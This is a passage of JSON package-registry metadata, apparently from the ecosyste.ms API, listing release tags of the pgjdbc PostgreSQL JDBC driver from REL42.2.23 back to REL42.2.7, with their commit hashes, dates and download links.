y_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23/manifests"},{"name":"REL42.2.23-rc6","sha":"d985dc19945dce93e09863b44118896927ef6d1f","kind":"tag","published_at":"2021-07-06T15:21:51.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.23-rc6","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.23-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.23-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc6/manifests"},{"name":"REL42.2.23-rc5","sha":"624d8b88dde210447f921725682ebd58e7466bf0","kind":"tag","published_at":"2021-07-05T15:30:58.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.23-rc5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.23-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.23-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc5/manifests"},{"name":"REL42.2.23-rc4","sha":"70f576c5ec6cf0d24c942b7b337ba164665e6fd3","kind":"tag","published_at":"2021-07-05T14:55:54.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.23-rc4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.23-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.23-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc4/manifests"},{"name":"REL42.2.23-rc3","sha":"70f576c5ec6cf0d24c942b7b337ba164665e6fd3","kind":"tag","published_at":"2021-07-05T12:52:17.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.23-rc3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.23-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.23-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc3/manifests"},{"name":"REL42.2.23-rc1","sha":"70f576c5ec6cf0d24c942b7b337ba164665e6fd3","kind":"tag","published_at":"2021-07-05T12:37:07.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.23-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.23-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.23-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc1/manifests"},{"name":"REL42.2.22-rc1","sha":"466bad19c4340c3808b718cad0ea8e0f347a28b3","kind":"tag","published_at":"2021-06-16T15:08:48.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.22-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.22-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.22-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.22-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.22-rc1/manifests"},{"name":"REL42.2.22","sha":"466bad19c4340c3808b718cad0ea8e0f347a28b3","kind":"commit","published_at":"2021-06-16T14:49:54.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.22","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.22/manifests"},{"name":"REL42.2.21","sha":"90e694d15223acdd252a49deb7528742adeb1554","kind":"tag","published_at":"2021-06-10T18:44:08.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.21","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.21/manifests"},{"name":"REL42.2.21-rc2","sha":"90e694d15223acdd252a49deb7528742adeb1554","kind":"tag","published_at":"2021-06-10T18:23:59.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.21-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.21-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.21-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.21-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.21-rc2/manifests"},{"name":"REL42.2.21-rc1","sha":"90e694d15223acdd252a49deb7528742adeb1554","kind":"tag","published_at":"2021-06-10T18:21:21.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.21-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.21-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.21-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.21-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.21-rc1/manifests"},{"name":"REL42.2.20","sha":"1a15d6edfecb58dcd5d81f9de8262c3fc89ada07","kind":"tag","published_at":"2021-04-22T13:23:29.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.20","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.20/manifests"},{"name":"REL42.2.20-rc2","sha":"1a15d6edfecb58dcd5d81f9de8262c3fc89ada07","kind":"tag","published_at":"2021-04-22T13:03:02.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.20-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.20-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.20-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.20-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.20-rc2/manifests"},{"name":"REL42.2.20-rc1","sha":"1a15d6edfecb58dcd5d81f9de8262c3fc89ada07","kind":"tag","published_at":"2021-04-22T12:37:14.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.20-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.20-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.20-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.20-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.20-rc1/manifests"},{"name":"REL42.2.19","sha":"207ce36ec2c5cce30c454afa3e51f39bbe5bd26b","kind":"tag","published_at":"2021-02-18T19:32:40.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.19","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.19/manifests"},{"name":"REL42.2.19-rc2","sha":"207ce36ec2c5cce30c454afa3e51f39bbe5bd26b","kind":"tag","published_at":"2021-02-18T18:45:21.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.19-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.19-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.19-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.19-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.19-rc2/manifests"},{"name":"REL42.2.19-rc1","sha":"18cec592278e7f16bacdd5083017686be41d9da6","kind":"tag","published_at":"2021-02-18T15:21:55.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.19-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.19-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.19-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.19-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.19-rc1/manifests"},{"name":"REL42.2.18","sha":"7b7d2a9140dba1733cdd4bb720912621578ba846","kind":"tag","published_at":"2020-10-15T13:45:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.18","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.18/manifests"},{"name":"REL42.2.18-rc1","sha":"7b7d2a9140dba1733cdd4bb720912621578ba846","kind":"tag","published_at":"2020-10-15T13:12:32.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.18-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.18-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.18-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.18-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.18-rc1/manifests"},{"name":"REL42.2.17","sha":"901962b028e6061227bfd2124ab6e245e9c952a3","kind":"tag","published_at":"2020-10-09T13:43:49.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.17","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.17/manifests"},{"name":"REL42.2.17-rc1","sha":"901962b028e6061227bfd2124ab6e245e9c952a3","kind":"tag","published_at":"2020-10-09T12:29:44.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.17-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.17-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.17-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.17-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.17-rc1/manifests"},{"name":"REL42.2.16","sha":"5e4bbc88ccea2e9ff1f9bb02e3d17893a6f630e3","kind":"tag","published_at":"2020-08-21T19:33:24.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.16","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.16/manifests"},{"name":"REL42.2.16-rc2","sha":"5e4bbc88ccea2e9ff1f9bb02e3d17893a6f630e3","kind":"tag","published_at":"2020-08-21T18:15:23.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.16-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.16-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.16-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.16-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.16-rc2/manifests"},{"name":"REL42.2.16-rc1","sha":"3792f47ebfad1f7c746abcc1f6ed6d0411fbbb0c","kind":"tag","published_at":"2020-08-21T17:04:02.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.16-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.16-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.16-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.16-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.16-rc1/manifests"},{"name":"REL42.2.15","sha":"3802b453608349b11a81585f3dbca9f623687d3d","kind":"tag","published_at":"2020-08-14T18:24:59.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.15","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.15/manifests"},{"name":"REL42.2.15-rc2","sha":"3802b453608349b11a81585f3dbca9f623687d3d","kind":"tag","published_at":"2020-08-07T15:16:50.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.15-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.15-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.15-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.15-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.15-rc2/manifests"},{"name":"REL42.2.15-rc1","sha":"6bacf8d4570e8a23e6f57cf3138a68725b4b4ad6","kind":"tag","published_at":"2020-06-19T16:39:23.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.15-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.15-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.15-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.15-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.15-rc1/manifests"},{"name":"REL42.2.14","sha":"acd0724411fc5dde7a57263c48013048e001c641","kind":"tag","published_at":"2020-06-10T16:56:14.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.14","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.14/manifests"},{"name":"REL42.2.14-rc1","sha":"acd0724411fc5dde7a57263c48013048e001c641","kind":"tag","published_at":"2020-06-10T14:44:56.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.14-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.14-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.14-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.14-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.14-rc1/manifests"},{"name":"REL42.2.13","sha":"e63584cfb2bbb904a971a0b19cb4857249e0b8e2","kind":"tag","published_at":"2020-06-04T14:41:33.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.13","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.13/manifests"},{"name":"REL42.3.0-rc1","sha":"14b62aca4764d496813f55a43d050b017e01eb65","kind":"tag","published_at":"2020-06-01T13:06:47.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.0-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.0-rc1/manifests"},{"name":"REL42.2.13-rc1","sha":"ff368032bd539c8b8adac09b7a64d3788281db4d","kind":"tag","published_at":"2020-05-28T13:42:42.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.13-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.13-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.13-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.13-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.13-rc1/manifests"},{"name":"v42.2.13-rc1","sha":"c6b3cd5468c93068c5b528773ca990b9f0b29a1a","kind":"tag","published_at":"2020-05-27T14:41:44.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/v42.2.13-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/v42.2.13-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@v42.2.13-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/v42.2.13-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/v42.2.13-rc1/manifests"},{"name":"REL42.2.12","sha":"f06c15eac9d517f08bc21913fb20ee47b125d40b","kind":"tag","published_at":"2020-03-31T18:52:10.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.12","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.12/manifests"},{"name":"REL42.2.11","sha":"2083cf472be3006a01493b8fe42de54eabf9ba07","kind":"tag","published_at":"2020-03-10T15:38:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.11","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.11/manifests"},{"name":"v42.3.0-rc5","sha":"a7d6e00b8281faaf6ff07b06a60d3291763afb8c","kind":"tag","published_at":"2020-03-04T21:09:06.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/v42.3.0-rc5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/v42.3.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@v42.3.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/v42.3.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/v42.3.0-rc5/manifests"},{"name":"v42.3.0-rc2","sha":"2c1e0ef343050cb880b896abb142b2312d6988a7","kind":"tag","published_at":"2020-03-01T18:39:19.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/v42.3.0-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/v42.3.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@v42.3.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/v42.3.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/v42.3.0-rc2/manifests"},{"name":"v42.3.0-rc1","sha":"860979fd94d7e87ef33c6535b30eb2e8cd80acdd","kind":"tag","published_at":"2020-03-01T18:19:13.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/v42.3.0-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/v42.3.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@v42.3.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/v42.3.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/v42.3.0-rc1/manifests"},{"name":"REL42.2.10","sha":"c81913658858c623ebc4582eb703c2d8e21212ee","kind":"tag","published_at":"2020-02-06T18:49:59.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.10","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.10/manifests"},{"name":"REL42.2.9","sha":"29c65312a110b1ed9811930547540ebb34188e15","kind":"tag","published_at":"2019-12-07T14:12:18.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.9","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.9/manifests"},{"name":"REL42.2.8","sha":"33e74f5c2239ea79a9dffb13eb1a3eb8625b3d9a","kind":"tag","published_at":"2019-09-13T17:05:06.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.8","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.8/manifests"},{"name":"REL42.2.7","sha":"443521738ab6ab6bcc4a4a8eaaf632899228dc4d","kind":"tag","published_at":"2019-09-10T12:39:02.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.7","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/